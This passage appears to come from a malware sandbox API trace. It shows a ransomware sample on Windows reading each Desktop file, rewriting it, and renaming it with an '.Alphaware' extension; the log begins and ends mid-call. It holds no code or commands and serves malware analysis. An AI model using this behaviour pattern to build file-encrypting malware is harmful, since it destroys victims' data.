lpFileInformation=0x23ec50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c1b19f0, ftCreationTime.dwHighDateTime=0x1d96657, ftLastAccessTime.dwLowDateTime=0x2adc7f00, ftLastAccessTime.dwHighDateTime=0x1d96831, ftLastWriteTime.dwLowDateTime=0x822c96e0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x64a0)) returned 1 [0080.491] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e8d8) returned 1 [0080.491] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Desktop\\KMPe82eGM5iAzO PVI.mp3" (normalized: "c:\\users\\keecfmwgj\\desktop\\kmpe82egm5iazo pvi.mp3"), lpNewFileName="C:\\Users\\kEecfMwgj\\Desktop\\KMPe82eGM5iAzO PVI.mp3.Alphaware" (normalized: "c:\\users\\keecfmwgj\\desktop\\kmpe82egm5iazo pvi.mp3.alphaware")) returned 1 [0080.494] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\MKPZbzGpKYHPVsXosEp3.mp3", dwFileAttributes=0x80) returned 1 [0080.495] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9f8) returned 1 [0080.495] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\MKPZbzGpKYHPVsXosEp3.mp3" (normalized: "c:\\users\\keecfmwgj\\desktop\\mkpzbzgpkyhpvsxosep3.mp3"), fInfoLevelId=0x0, lpFileInformation=0x2617a58 | out: lpFileInformation=0x2617a58*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xf8f1ece0, ftCreationTime.dwHighDateTime=0x1d96ee9, ftLastAccessTime.dwLowDateTime=0xd86d5fb0, ftLastAccessTime.dwHighDateTime=0x1d97171, ftLastWriteTime.dwLowDateTime=0xd86d5fb0, ftLastWriteTime.dwHighDateTime=0x1d97171, nFileSizeHigh=0x0, nFileSizeLow=0x6f76)) returned 1 [0080.495] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9a8) returned 1 [0080.495] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ea88) returned 1 [0080.495] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\MKPZbzGpKYHPVsXosEp3.mp3" (normalized: "c:\\users\\keecfmwgj\\desktop\\mkpzbzgpkyhpvsxosep3.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x254 [0080.496] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9f8) returned 1 [0080.496] ReadFile (in: hFile=0x254, lpBuffer=0x2617ce0, nNumberOfBytesToRead=0x6f76, lpNumberOfBytesRead=0x23eb38, lpOverlapped=0x0 | out: lpBuffer=0x2617ce0*, lpNumberOfBytesRead=0x23eb38*=0x6f76, lpOverlapped=0x0) returned 1 [0080.540] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9b8) returned 1 [0080.540] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\MKPZbzGpKYHPVsXosEp3.mp3" (normalized: "c:\\users\\keecfmwgj\\desktop\\mkpzbzgpkyhpvsxosep3.mp3"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x254 [0080.544] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e928) returned 1 [0080.547] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e928) returned 1 [0080.547] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\MKPZbzGpKYHPVsXosEp3.mp3" (normalized: "c:\\users\\keecfmwgj\\desktop\\mkpzbzgpkyhpvsxosep3.mp3"), fInfoLevelId=0x0, lpFileInformation=0x23ec50 | out: lpFileInformation=0x23ec50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf8f1ece0, ftCreationTime.dwHighDateTime=0x1d96ee9, ftLastAccessTime.dwLowDateTime=0xd86d5fb0, ftLastAccessTime.dwHighDateTime=0x1d97171, ftLastWriteTime.dwLowDateTime=0x82361c60, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x9574)) returned 1 [0080.547] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e8d8) returned 1 [0080.547] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Desktop\\MKPZbzGpKYHPVsXosEp3.mp3" (normalized: "c:\\users\\keecfmwgj\\desktop\\mkpzbzgpkyhpvsxosep3.mp3"), lpNewFileName="C:\\Users\\kEecfMwgj\\Desktop\\MKPZbzGpKYHPVsXosEp3.mp3.Alphaware" (normalized: "c:\\users\\keecfmwgj\\desktop\\mkpzbzgpkyhpvsxosep3.mp3.alphaware")) returned 1 [0080.549] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\MNGJ sodzb1khxMh.mp4", dwFileAttributes=0x80) returned 1 [0080.550] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9f8) returned 1 [0080.550] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\MNGJ sodzb1khxMh.mp4" (normalized: "c:\\users\\keecfmwgj\\desktop\\mngj sodzb1khxmh.mp4"), fInfoLevelId=0x0, lpFileInformation=0x24e0488 | out: lpFileInformation=0x24e0488*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5181d1d0, ftCreationTime.dwHighDateTime=0x1d970ee, ftLastAccessTime.dwLowDateTime=0xcabd79d0, ftLastAccessTime.dwHighDateTime=0x1d972c1, ftLastWriteTime.dwLowDateTime=0xcabd79d0, ftLastWriteTime.dwHighDateTime=0x1d972c1, nFileSizeHigh=0x0, nFileSizeLow=0x3da4)) returned 1 [0080.550] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9a8) returned 1 [0080.550] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ea88) returned 1 [0080.550] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\MNGJ sodzb1khxMh.mp4" (normalized: "c:\\users\\keecfmwgj\\desktop\\mngj sodzb1khxmh.mp4"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x254 [0080.551] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9f8) returned 1 [0080.551] ReadFile (in: hFile=0x254, lpBuffer=0x24e0708, nNumberOfBytesToRead=0x3da4, lpNumberOfBytesRead=0x23eb38, lpOverlapped=0x0 | out: lpBuffer=0x24e0708*, lpNumberOfBytesRead=0x23eb38*=0x3da4, lpOverlapped=0x0) returned 1 [0080.582] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9b8) returned 1 [0080.582] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\MNGJ sodzb1khxMh.mp4" (normalized: "c:\\users\\keecfmwgj\\desktop\\mngj sodzb1khxmh.mp4"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x254 [0080.584] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e928) returned 1 [0080.586] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e928) returned 1 [0080.586] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\MNGJ sodzb1khxMh.mp4" (normalized: "c:\\users\\keecfmwgj\\desktop\\mngj sodzb1khxmh.mp4"), fInfoLevelId=0x0, lpFileInformation=0x23ec50 | out: lpFileInformation=0x23ec50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5181d1d0, ftCreationTime.dwHighDateTime=0x1d970ee, ftLastAccessTime.dwLowDateTime=0xcabd79d0, ftLastAccessTime.dwHighDateTime=0x1d972c1, ftLastWriteTime.dwLowDateTime=0x823adf20, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x5308)) returned 1 [0080.586] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e8d8) returned 1 [0080.586] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Desktop\\MNGJ sodzb1khxMh.mp4" (normalized: "c:\\users\\keecfmwgj\\desktop\\mngj sodzb1khxmh.mp4"), lpNewFileName="C:\\Users\\kEecfMwgj\\Desktop\\MNGJ sodzb1khxMh.mp4.Alphaware" (normalized: "c:\\users\\keecfmwgj\\desktop\\mngj sodzb1khxmh.mp4.alphaware")) returned 1 [0080.588] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\mvpq.xls", dwFileAttributes=0x80) returned 1 [0080.588] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9f8) returned 1 [0080.588] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\mvpq.xls" (normalized: "c:\\users\\keecfmwgj\\desktop\\mvpq.xls"), fInfoLevelId=0x0, lpFileInformation=0x2589f70 | out: lpFileInformation=0x2589f70*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x46c6b0d0, ftCreationTime.dwHighDateTime=0x1d96abd, ftLastAccessTime.dwLowDateTime=0x98d5c7c0, ftLastAccessTime.dwHighDateTime=0x1d96c9e, ftLastWriteTime.dwLowDateTime=0x98d5c7c0, ftLastWriteTime.dwHighDateTime=0x1d96c9e, nFileSizeHigh=0x0, nFileSizeLow=0x10070)) returned 1 [0080.588] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9a8) returned 1 [0080.588] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ea88) returned 1 [0080.589] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\mvpq.xls" (normalized: "c:\\users\\keecfmwgj\\desktop\\mvpq.xls"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x254 [0080.589] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9f8) returned 1 [0080.589] ReadFile (in: hFile=0x254, lpBuffer=0x258a178, nNumberOfBytesToRead=0x10070, lpNumberOfBytesRead=0x23eb38, lpOverlapped=0x0 | out: lpBuffer=0x258a178*, lpNumberOfBytesRead=0x23eb38*=0x10070, lpOverlapped=0x0) returned 1 [0080.611] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9b8) returned 1 [0080.611] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\mvpq.xls" (normalized: "c:\\users\\keecfmwgj\\desktop\\mvpq.xls"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x254 [0080.613] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e928) returned 1 [0080.617] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e928) returned 1 [0080.617] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\mvpq.xls" (normalized: "c:\\users\\keecfmwgj\\desktop\\mvpq.xls"), fInfoLevelId=0x0, lpFileInformation=0x23ec50 | out: lpFileInformation=0x23ec50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x46c6b0d0, ftCreationTime.dwHighDateTime=0x1d96abd, ftLastAccessTime.dwLowDateTime=0x98d5c7c0, ftLastAccessTime.dwHighDateTime=0x1d96c9e, ftLastWriteTime.dwLowDateTime=0x823fa1e0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x156c8)) returned 1 [0080.617] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e8d8) returned 1 [0080.617] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Desktop\\mvpq.xls" (normalized: "c:\\users\\keecfmwgj\\desktop\\mvpq.xls"), lpNewFileName="C:\\Users\\kEecfMwgj\\Desktop\\mvpq.xls.Alphaware" (normalized: "c:\\users\\keecfmwgj\\desktop\\mvpq.xls.alphaware")) returned 1 [0080.622] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\mxWMxpSlb1Z2y3xfhO0.swf", dwFileAttributes=0x80) returned 1 [0080.622] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9f8) returned 1 [0080.622] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\mxWMxpSlb1Z2y3xfhO0.swf" (normalized: "c:\\users\\keecfmwgj\\desktop\\mxwmxpslb1z2y3xfho0.swf"), fInfoLevelId=0x0, lpFileInformation=0x2648170 | out: lpFileInformation=0x2648170*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd2ab00, ftCreationTime.dwHighDateTime=0x1d96ed7, ftLastAccessTime.dwLowDateTime=0x50250fa0, ftLastAccessTime.dwHighDateTime=0x1d9741d, ftLastWriteTime.dwLowDateTime=0x50250fa0, ftLastWriteTime.dwHighDateTime=0x1d9741d, nFileSizeHigh=0x0, nFileSizeLow=0xe42e)) returned 1 [0080.623] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9a8) returned 1 [0080.623] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ea88) returned 1 [0080.623] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\mxWMxpSlb1Z2y3xfhO0.swf" (normalized: "c:\\users\\keecfmwgj\\desktop\\mxwmxpslb1z2y3xfho0.swf"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x254 [0080.623] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9f8) returned 1 [0080.623] ReadFile (in: hFile=0x254, lpBuffer=0x26483e8, nNumberOfBytesToRead=0xe42e, lpNumberOfBytesRead=0x23eb38, lpOverlapped=0x0 | out: lpBuffer=0x26483e8*, lpNumberOfBytesRead=0x23eb38*=0xe42e, lpOverlapped=0x0) returned 1 [0080.649] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9b8) returned 1 [0080.649] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\mxWMxpSlb1Z2y3xfhO0.swf" (normalized: "c:\\users\\keecfmwgj\\desktop\\mxwmxpslb1z2y3xfho0.swf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x254 [0080.652] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e928) returned 1 [0080.655] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e928) returned 1 [0080.655] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\mxWMxpSlb1Z2y3xfhO0.swf" (normalized: "c:\\users\\keecfmwgj\\desktop\\mxwmxpslb1z2y3xfho0.swf"), fInfoLevelId=0x0, lpFileInformation=0x23ec50 | out: lpFileInformation=0x23ec50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbd2ab00, ftCreationTime.dwHighDateTime=0x1d96ed7, ftLastAccessTime.dwLowDateTime=0x50250fa0, ftLastAccessTime.dwHighDateTime=0x1d9741d, ftLastWriteTime.dwLowDateTime=0x8246c600, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x13108)) returned 1 [0080.656] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e8d8) returned 1 [0080.656] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Desktop\\mxWMxpSlb1Z2y3xfhO0.swf" (normalized: "c:\\users\\keecfmwgj\\desktop\\mxwmxpslb1z2y3xfho0.swf"), lpNewFileName="C:\\Users\\kEecfMwgj\\Desktop\\mxWMxpSlb1Z2y3xfhO0.swf.Alphaware" (normalized: "c:\\users\\keecfmwgj\\desktop\\mxwmxpslb1z2y3xfho0.swf.alphaware")) returned 1 [0080.658] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\oa aQQjrX6y_jTlap6.png", dwFileAttributes=0x80) returned 1 [0080.659] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9f8) returned 1 [0080.659] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\oa aQQjrX6y_jTlap6.png" (normalized: "c:\\users\\keecfmwgj\\desktop\\oa aqqjrx6y_jtlap6.png"), fInfoLevelId=0x0, lpFileInformation=0x2505f30 | out: lpFileInformation=0x2505f30*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5c9986a0, ftCreationTime.dwHighDateTime=0x1d9743e, ftLastAccessTime.dwLowDateTime=0x990eef10, ftLastAccessTime.dwHighDateTime=0x1d97634, ftLastWriteTime.dwLowDateTime=0x990eef10, ftLastWriteTime.dwHighDateTime=0x1d97634, nFileSizeHigh=0x0, nFileSizeLow=0x2e18)) returned 1 [0080.659] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9a8) returned 1 [0080.659] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ea88) returned 1 [0080.659] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\oa aQQjrX6y_jTlap6.png" (normalized: "c:\\users\\keecfmwgj\\desktop\\oa aqqjrx6y_jtlap6.png"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x254 [0080.659] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9f8) returned 1 [0080.660] ReadFile (in: hFile=0x254, lpBuffer=0x25061a8, nNumberOfBytesToRead=0x2e18, lpNumberOfBytesRead=0x23eb38, lpOverlapped=0x0 | out: lpBuffer=0x25061a8*, lpNumberOfBytesRead=0x23eb38*=0x2e18, lpOverlapped=0x0) returned 1 [0080.680] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9b8) returned 1 [0080.680] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\oa aQQjrX6y_jTlap6.png" (normalized: "c:\\users\\keecfmwgj\\desktop\\oa aqqjrx6y_jtlap6.png"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x254 [0080.682] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e928) returned 1 [0080.683] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e928) returned 1 [0080.683] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\oa aQQjrX6y_jTlap6.png" (normalized: "c:\\users\\keecfmwgj\\desktop\\oa aqqjrx6y_jtlap6.png"), fInfoLevelId=0x0, lpFileInformation=0x23ec50 | out: lpFileInformation=0x23ec50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5c9986a0, ftCreationTime.dwHighDateTime=0x1d9743e, ftLastAccessTime.dwLowDateTime=0x990eef10, ftLastAccessTime.dwHighDateTime=0x1d97634, ftLastWriteTime.dwLowDateTime=0x82492760, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x3e48)) returned 1 [0080.684] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e8d8) returned 1 [0080.684] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Desktop\\oa aQQjrX6y_jTlap6.png" (normalized: "c:\\users\\keecfmwgj\\desktop\\oa aqqjrx6y_jtlap6.png"), lpNewFileName="C:\\Users\\kEecfMwgj\\Desktop\\oa aQQjrX6y_jTlap6.png.Alphaware" (normalized: "c:\\users\\keecfmwgj\\desktop\\oa aqqjrx6y_jtlap6.png.alphaware")) returned 1 [0080.685] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\OYZWN3-fBul2M9U.wav", dwFileAttributes=0x80) returned 1 [0080.686] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9f8) returned 1 [0080.686] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\OYZWN3-fBul2M9U.wav" (normalized: "c:\\users\\keecfmwgj\\desktop\\oyzwn3-fbul2m9u.wav"), fInfoLevelId=0x0, lpFileInformation=0x25a58a8 | out: lpFileInformation=0x25a58a8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafdd0830, ftCreationTime.dwHighDateTime=0x1d96824, ftLastAccessTime.dwLowDateTime=0xe04cd250, ftLastAccessTime.dwHighDateTime=0x1d96cbd, ftLastWriteTime.dwLowDateTime=0xe04cd250, ftLastWriteTime.dwHighDateTime=0x1d96cbd, nFileSizeHigh=0x0, nFileSizeLow=0x1045d)) returned 1 [0080.686] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9a8) returned 1 [0080.686] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ea88) returned 1 [0080.686] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\OYZWN3-fBul2M9U.wav" (normalized: "c:\\users\\keecfmwgj\\desktop\\oyzwn3-fbul2m9u.wav"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x254 [0080.686] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9f8) returned 1 [0080.686] ReadFile (in: hFile=0x254, lpBuffer=0x25a5b00, nNumberOfBytesToRead=0x1045d, lpNumberOfBytesRead=0x23eb38, lpOverlapped=0x0 | out: lpBuffer=0x25a5b00*, lpNumberOfBytesRead=0x23eb38*=0x1045d, lpOverlapped=0x0) returned 1 [0080.708] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9b8) returned 1 [0080.709] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\OYZWN3-fBul2M9U.wav" (normalized: "c:\\users\\keecfmwgj\\desktop\\oyzwn3-fbul2m9u.wav"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x254 [0080.710] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e928) returned 1 [0080.714] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e928) returned 1 [0080.714] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\OYZWN3-fBul2M9U.wav" (normalized: "c:\\users\\keecfmwgj\\desktop\\oyzwn3-fbul2m9u.wav"), fInfoLevelId=0x0, lpFileInformation=0x23ec50 | out: lpFileInformation=0x23ec50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xafdd0830, ftCreationTime.dwHighDateTime=0x1d96824, ftLastAccessTime.dwLowDateTime=0xe04cd250, ftLastAccessTime.dwHighDateTime=0x1d96cbd, ftLastWriteTime.dwLowDateTime=0x824dea20, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x15bf4)) returned 1 [0080.714] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e8d8) returned 1 [0080.714] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Desktop\\OYZWN3-fBul2M9U.wav" (normalized: "c:\\users\\keecfmwgj\\desktop\\oyzwn3-fbul2m9u.wav"), lpNewFileName="C:\\Users\\kEecfMwgj\\Desktop\\OYZWN3-fBul2M9U.wav.Alphaware" (normalized: "c:\\users\\keecfmwgj\\desktop\\oyzwn3-fbul2m9u.wav.alphaware")) returned 1 [0080.715] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\PYDVqXrN.mkv", dwFileAttributes=0x80) returned 1 [0080.716] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9f8) returned 1 [0080.716] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\PYDVqXrN.mkv" (normalized: "c:\\users\\keecfmwgj\\desktop\\pydvqxrn.mkv"), fInfoLevelId=0x0, lpFileInformation=0x2664680 | out: lpFileInformation=0x2664680*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfb901750, ftCreationTime.dwHighDateTime=0x1d96d3c, ftLastAccessTime.dwLowDateTime=0xfe05c0b0, ftLastAccessTime.dwHighDateTime=0x1d974db, ftLastWriteTime.dwLowDateTime=0xfe05c0b0, ftLastWriteTime.dwHighDateTime=0x1d974db, nFileSizeHigh=0x0, nFileSizeLow=0x3bb2)) returned 1 [0080.716] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9a8) returned 1 [0080.716] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ea88) returned 1 [0080.716] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\PYDVqXrN.mkv" (normalized: "c:\\users\\keecfmwgj\\desktop\\pydvqxrn.mkv"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x254 [0080.716] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9f8) returned 1 [0080.717] ReadFile (in: hFile=0x254, lpBuffer=0x26648a8, nNumberOfBytesToRead=0x3bb2, lpNumberOfBytesRead=0x23eb38, lpOverlapped=0x0 | out: lpBuffer=0x26648a8*, lpNumberOfBytesRead=0x23eb38*=0x3bb2, lpOverlapped=0x0) returned 1 [0080.740] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9b8) returned 1 [0080.740] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\PYDVqXrN.mkv" (normalized: "c:\\users\\keecfmwgj\\desktop\\pydvqxrn.mkv"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x254 [0080.742] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e928) returned 1 [0080.744] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e928) returned 1 [0080.744] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\PYDVqXrN.mkv" (normalized: "c:\\users\\keecfmwgj\\desktop\\pydvqxrn.mkv"), fInfoLevelId=0x0, lpFileInformation=0x23ec50 | out: lpFileInformation=0x23ec50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfb901750, ftCreationTime.dwHighDateTime=0x1d96d3c, ftLastAccessTime.dwLowDateTime=0xfe05c0b0, ftLastAccessTime.dwHighDateTime=0x1d974db, ftLastWriteTime.dwLowDateTime=0x8252ace0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x5074)) returned 1 [0080.744] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e8d8) returned 1 [0080.744] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Desktop\\PYDVqXrN.mkv" (normalized: "c:\\users\\keecfmwgj\\desktop\\pydvqxrn.mkv"), lpNewFileName="C:\\Users\\kEecfMwgj\\Desktop\\PYDVqXrN.mkv.Alphaware" (normalized: "c:\\users\\keecfmwgj\\desktop\\pydvqxrn.mkv.alphaware")) returned 1 [0080.745] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\rmPQA vuvasucn14.mkv", dwFileAttributes=0x80) returned 1 [0080.746] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9f8) returned 1 [0080.746] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\rmPQA vuvasucn14.mkv" (normalized: "c:\\users\\keecfmwgj\\desktop\\rmpqa vuvasucn14.mkv"), fInfoLevelId=0x0, lpFileInformation=0x25020f0 | out: lpFileInformation=0x25020f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe1bd4770, ftCreationTime.dwHighDateTime=0x1d974ae, ftLastAccessTime.dwLowDateTime=0xfca44b10, ftLastAccessTime.dwHighDateTime=0x1d9767f, ftLastWriteTime.dwLowDateTime=0xfca44b10, ftLastWriteTime.dwHighDateTime=0x1d9767f, nFileSizeHigh=0x0, nFileSizeLow=0x92f0)) returned 1 [0080.746] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9a8) returned 1 [0080.746] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ea88) returned 1 [0080.746] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\rmPQA vuvasucn14.mkv" (normalized: "c:\\users\\keecfmwgj\\desktop\\rmpqa vuvasucn14.mkv"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, 